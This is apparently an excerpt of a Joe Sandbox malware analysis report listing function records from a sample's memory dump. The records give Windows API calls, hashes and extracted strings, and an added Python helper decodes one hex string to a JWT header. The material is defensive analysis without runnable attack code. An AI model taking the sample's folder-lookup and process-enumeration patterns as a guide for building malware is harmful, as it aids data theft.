                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Copy_strstd::exception::_
                            • String ID: Unknown exception
                            • API String ID: 356497065-410509341
                            • Opcode ID: 2460fe8681aa2102f4db070b162f63355c381bc40a5f035b010666d3f02072e8
                            • Instruction ID: a1d019a470fe4d46411d77303d5e733feb11dbc6778a1c9c929d3f0180f90fb6
                            • Opcode Fuzzy Hash: 2460fe8681aa2102f4db070b162f63355c381bc40a5f035b010666d3f02072e8
                            • Instruction Fuzzy Hash: 1AF0C23231C219EFCB21CF68D849ABABBAAAF55741F148469FA84C7311C375D8029B95
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006EE544
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EE573
                            • lstrcat.KERNEL32(?,00000000), ref: 006EE581
                            • lstrcat.KERNEL32(?,0101E6D8), ref: 006EE59C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: bc4dcdc3bd1aeaf96a85847c0c12b3dc2477182220feeac8465fcdf1a592d4d3
                            • Instruction ID: abf2a01a2f8598263da641d02baca7d5467da0a9208abd9df0fe8bf1a1bb3678
                            • Opcode Fuzzy Hash: bc4dcdc3bd1aeaf96a85847c0c12b3dc2477182220feeac8465fcdf1a592d4d3
                            • Instruction Fuzzy Hash: 3A5182B5A2011CAFD794EB54EC52EEA337EEF48300F44446DBA4587341EA71AE458BA4
                            APIs
                            Strings
                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 006F1FDF, 006F1FF5, 006F20B7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: strlen
                            • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 39653677-4138519520
                            • Opcode ID: ac514209981422d7018e1dbdbeaace3c6de09e106ae0ab28b076105dd7611635
                            • Instruction ID: f7bf9b3be10072e671469532752e1f4927f4c86f1d6d24f4c6c6f0c6928101f4
                            • Opcode Fuzzy Hash: ac514209981422d7018e1dbdbeaace3c6de09e106ae0ab28b076105dd7611635
                            • Instruction Fuzzy Hash: 5F21483651018F8AC720EA35C4A46FDF7A7EF803A1F844156CA180B381EB36194ADF96
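The Strings entry of the record above is printed by Joe Sandbox as a row of hex bytes, which hides what the string actually is. The Python helper below is added here as a worked example; it is not Joe Sandbox tooling and not code recovered from the sample. It converts such a hex row back to text and, when that text is base64 (a filter the helper applies on its own; the 16-character minimum is an assumption), decodes one more layer. The only input is the byte row copied from the report; on it the helper yields the JOSE header `{ "typ": "JWT", "alg": "EdDSA" }`. What the sample does with that header is not shown on this page.

```python
"""Decode a Joe Sandbox hex-dump string and peel a base64 layer if present.

Added example for reading the report above; not Joe Sandbox code and not
code from the analysed sample. REPORT_HEX is copied from the report's
Strings entry; the base64 filter and its 16-character minimum are assumptions.
"""
import base64
import binascii
import json
import re
import string
from typing import Optional

# Copied verbatim from the report (xrefs 006F1FDF, 006F1FF5, 006F20B7).
REPORT_HEX = ("65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 "
              "49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 "
              "49 48 30")

_B64_CHARS = set(string.ascii_letters + string.digits + "+/=")


def hex_dump_to_bytes(dump: str) -> bytes:
    """Turn 'XX XX XX ...' as the report prints it into raw bytes."""
    return bytes.fromhex(re.sub(r"\s+", "", dump))


def looks_like_base64(text: str) -> bool:
    """Cheap filter: base64 alphabet only, and long enough that plain words do not match."""
    return len(text) >= 16 and set(text) <= _B64_CHARS


def try_base64(text: str) -> Optional[bytes]:
    """Decode base64 whose '=' padding may have been stripped; None if it is not base64."""
    if not looks_like_base64(text):
        return None
    padded = text + "=" * (-len(text) % 4)
    try:
        return base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None


def decode_report_string(dump: str) -> dict:
    """Return each layer an analyst wants: raw ASCII, base64-decoded text, parsed JSON (if any)."""
    raw = hex_dump_to_bytes(dump)
    ascii_text = raw.decode("ascii", errors="replace")
    result = {"ascii": ascii_text, "base64_decoded": None, "json": None}
    inner = try_base64(ascii_text)
    if inner is not None:
        inner_text = inner.decode("utf-8", errors="replace")
        result["base64_decoded"] = inner_text
        try:
            result["json"] = json.loads(inner_text)
        except json.JSONDecodeError:
            pass  # base64 but not JSON: leave the decoded text for manual review
    return result


if __name__ == "__main__":
    for layer, value in decode_report_string(REPORT_HEX).items():
        print(f"{layer}: {value!r}")
```

The `validate=True` flag makes `b64decode` reject anything outside the base64 alphabet instead of silently skipping it, so a string that merely resembles base64 comes back as `None` rather than as garbage bytes.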
                            APIs
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006EEBB4
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EEBE3
                            • lstrcat.KERNEL32(?,00000000), ref: 006EEBF1
                            • lstrcat.KERNEL32(?,0101F1F0), ref: 006EEC0C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FolderPathlstrcpy
                            • String ID:
                            • API String ID: 818526691-0
                            • Opcode ID: b0b8f058ae67eccdee5913ba1775058dbdee68409f188d04fb77d2de123186da
                            • Instruction ID: f7df9dc8553132f941a683bd9218d92f413a510d8609ecb54abfbe35a8a96330
                            • Opcode Fuzzy Hash: b0b8f058ae67eccdee5913ba1775058dbdee68409f188d04fb77d2de123186da
                            • Instruction Fuzzy Hash: 7731A4B1E1011DAFCB61EF64DC51BEE73B5EF58300F1414A9BA169B351DE309E448B94
                            APIs
                            • OpenProcess.KERNEL32(00000410,00000000), ref: 006F4492
                            • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 006F44AD
                            • CloseHandle.KERNEL32(00000000), ref: 006F44B4
                            • lstrcpy.KERNEL32(00000000,?), ref: 006F44E7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                            • String ID:
                            • API String ID: 4028989146-0
                            • Opcode ID: 61b4d2aef9cb0c27d0f676cb3d8055f25af4917f6f774db11e0b34878d7cdf6f
                            • Instruction ID: e597c6671c260047159f3368e180f88f29b82eedb62bc40b3ee989b15cbdb112
                            • Opcode Fuzzy Hash: 61b4d2aef9cb0c27d0f676cb3d8055f25af4917f6f774db11e0b34878d7cdf6f
                            • Instruction Fuzzy Hash: CCF0C8B09056192FE7209B749C49BFB76E9EF14304F004591EB85E7280DAB088848790
                            APIs
                            • __getptd.LIBCMT ref: 006F8FDD
                              • Part of subcall function 006F87FF: __amsg_exit.LIBCMT ref: 006F880F
                            • __getptd.LIBCMT ref: 006F8FF4
                            • __amsg_exit.LIBCMT ref: 006F9002
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 006F9026
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: 36fd3d6ff68f7ce728837d12de1887d34083b97f16dca8db3b5e160397242e9c
                            • Instruction ID: b5fa703a8835e562abcc305b0505d553d33e4b784b9096a4666bf9ffe4ddcaa7
                            • Opcode Fuzzy Hash: 36fd3d6ff68f7ce728837d12de1887d34083b97f16dca8db3b5e160397242e9c
                            • Instruction Fuzzy Hash: ACF0F632908618CFD7A0BB789807B7D33A36F00760F24425CF210672D2CF681840DA6D
                            APIs
                            • lstrlen.KERNEL32(------,006D5BEB), ref: 006F731B
                            • lstrcpy.KERNEL32(00000000), ref: 006F733F
                            • lstrcat.KERNEL32(?,------), ref: 006F7349
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcatlstrcpylstrlen
                            • String ID: ------
                            • API String ID: 3050337572-882505780
                            • Opcode ID: 8da7c0db24fa39fb9480b78c2c112cdeabf841c4c3756df3384e49edd13c1782
                            • Instruction ID: bc990791a69f3ff8301d0f0a51b5e4e03fa17a4cb12b33e0057f1fa38be4c09e
                            • Opcode Fuzzy Hash: 8da7c0db24fa39fb9480b78c2c112cdeabf841c4c3756df3384e49edd13c1782
                            • Instruction Fuzzy Hash: 67F0C9B5A15702AFDB649F35D858927BAFAFF84701318882DA8DAC7315EB30D840EB50
                            APIs
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D1557
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D1579
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D159B
                              • Part of subcall function 006D1530: lstrcpy.KERNEL32(00000000,?), ref: 006D15FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E3422
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E344B
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E3471
                            • lstrcpy.KERNEL32(00000000,?), ref: 006E3497
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0
                            • Opcode ID: d86bd70bb0a701f9f6e5f6a2d07623b06f387596f6a3286c4f14dc9c81f802a5
                            • Instruction ID: bea40465acfcfbe5d6cc6fa56054c63d9eff1185dbd5ccebd5aaa685350ed504
                            • Opcode Fuzzy Hash: d86bd70bb0a701f9f6e5f6a2d07623b06f387596f6a3286c4f14dc9c81f802a5
                            • Instruction Fuzzy Hash: 6E120DB0A163619FDB58CF1AC558B65B7E6AF44318B19C0AEE409CB3A2D772DD42CF40
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 006E7C94
                            • std::_Xinvalid_argument.LIBCPMT ref: 006E7CAF
                              • Part of subcall function 006E7D40: std::_Xinvalid_argument.LIBCPMT ref: 006E7D58
                              • Part of subcall function 006E7D40: std::_Xinvalid_argument.LIBCPMT ref: 006E7D76
                              • Part of subcall function 006E7D40: std::_Xinvalid_argument.LIBCPMT ref: 006E7D91
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Xinvalid_argumentstd::_
                            • String ID: string too long
                            • API String ID: 909987262-2556327735
                            • Opcode ID: 3c85732ac7e68f8379aeeb42688d02a595f4c5f762720f2f4c19e7681d9afbce
                            • Instruction ID: bc31f5345433fa282b1fac2547d68137cc5a262a34e0cbcdc85204c01bfb56b8
                            • Opcode Fuzzy Hash: 3c85732ac7e68f8379aeeb42688d02a595f4c5f762720f2f4c19e7681d9afbce
                            • Instruction Fuzzy Hash: 9B31F8B230A3948FD724DE6DE88096AF3EFDF91B50B30466AF5418B741D7719C418395
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,?), ref: 006D6F74
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006D6F7B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcess
                            • String ID: @
                            • API String ID: 1357844191-2766056989
                            • Opcode ID: a6cb7329c6676758da8caa231f93b70ce5b7be6cb9bb3f8fc59d82364dff39ab
                            • Instruction ID: 32247aafc3f21bd4afb345c6c6bd7cd9caaa652c6b2abb18dbc198fc91a3d033
                            • Opcode Fuzzy Hash: a6cb7329c6676758da8caa231f93b70ce5b7be6cb9bb3f8fc59d82364dff39ab
                            • Instruction Fuzzy Hash: F0216FB1A00A019BEB208F20D884BBA73BAEB45704F444869F946CB785F775E945C751
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006F244C
                            • lstrlen.KERNEL32(00000000), ref: 006F24E9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F2570
                            • lstrlen.KERNEL32(00000000), ref: 006F2577
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                             • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmp
